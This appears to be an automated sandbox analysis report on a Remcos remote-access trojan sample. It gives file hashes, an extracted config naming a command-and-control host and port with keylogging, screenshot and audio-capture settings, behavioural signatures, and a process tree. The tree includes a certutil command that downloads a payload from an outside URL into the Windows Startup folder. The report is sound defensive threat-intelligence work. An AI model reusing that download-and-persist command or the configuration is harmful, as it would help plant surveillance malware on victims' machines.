Analysis
-
max time kernel
0s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
06/01/2024, 09:54
Static task
static1
Behavioral task
behavioral1
Sample
45ee62b5a9674f830fa205308be5a0cf.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
45ee62b5a9674f830fa205308be5a0cf.exe
Resource
win10v2004-20231222-en
General
-
Target
45ee62b5a9674f830fa205308be5a0cf.exe
-
Size
1.1MB
-
MD5
45ee62b5a9674f830fa205308be5a0cf
-
SHA1
55b3719232d693ba9791fb3062b03adb4e35a808
-
SHA256
ce725389bc4ffd7fbe0b28ad72c38f64bbd751664c81171d982d5a9d484029c0
-
SHA512
47076eadafa4758d061f8485b342371f018da7f8b79266f3cf6a1717a36c32466f25ad3a10bdb98925f1f42a9e40809b3c906e39d4d96d7c2b1235a3363a25da
-
SSDEEP
24576:h/CNBKOsWsN6640tJn5mTBQGktmHa2nMviVD5ucpzdwx:yKOaBfIBQG6Ya2nwifucxdq
Malware Config
Extracted
remcos
2.4.5 Pro
Remote%Host
www.rmagent.biz:7181
-
audio_folder
MicRecords
-
audio_path
%AppData%
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
vbs.server.exe
-
copy_folder
vbs.server
-
delete_file
true
-
hide_file
true
-
hide_keylog_file
false
-
install_flag
false
-
install_path
%AppData%
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
Remcos-00GA1C
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
vbs.server
-
take_screenshot_option
false
-
take_screenshot_time
5
-
take_screenshot_title
wikipedia;solitaire;
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 2028 45ee62b5a9674f830fa205308be5a0cf.exe 2028 45ee62b5a9674f830fa205308be5a0cf.exe 2028 45ee62b5a9674f830fa205308be5a0cf.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2028 45ee62b5a9674f830fa205308be5a0cf.exe 2028 45ee62b5a9674f830fa205308be5a0cf.exe 2028 45ee62b5a9674f830fa205308be5a0cf.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2028 wrote to memory of 2092 2028 45ee62b5a9674f830fa205308be5a0cf.exe 20 PID 2028 wrote to memory of 2092 2028 45ee62b5a9674f830fa205308be5a0cf.exe 20 PID 2028 wrote to memory of 2092 2028 45ee62b5a9674f830fa205308be5a0cf.exe 20 PID 2028 wrote to memory of 2092 2028 45ee62b5a9674f830fa205308be5a0cf.exe 20 PID 2092 wrote to memory of 2796 2092 cmd.exe 18 PID 2092 wrote to memory of 2796 2092 cmd.exe 18 PID 2092 wrote to memory of 2796 2092 cmd.exe 18 PID 2092 wrote to memory of 2796 2092 cmd.exe 18
Processes
-
C:\Users\Admin\AppData\Local\Temp\45ee62b5a9674f830fa205308be5a0cf.exe"C:\Users\Admin\AppData\Local\Temp\45ee62b5a9674f830fa205308be5a0cf.exe"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Users\Admin\AppData\Local\Temp\45ee62b5a9674f830fa205308be5a0cf.exe"C:\Users\Admin\AppData\Local\Temp\45ee62b5a9674f830fa205308be5a0cf.exe"2⤵PID:2612
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\startup.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2092
-
-
C:\Windows\SysWOW64\certutil.execertutil.exe -urlcache -split -f "http://al-sharqgroup.com/remcos_agent.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yourfile.exe"1⤵PID:2796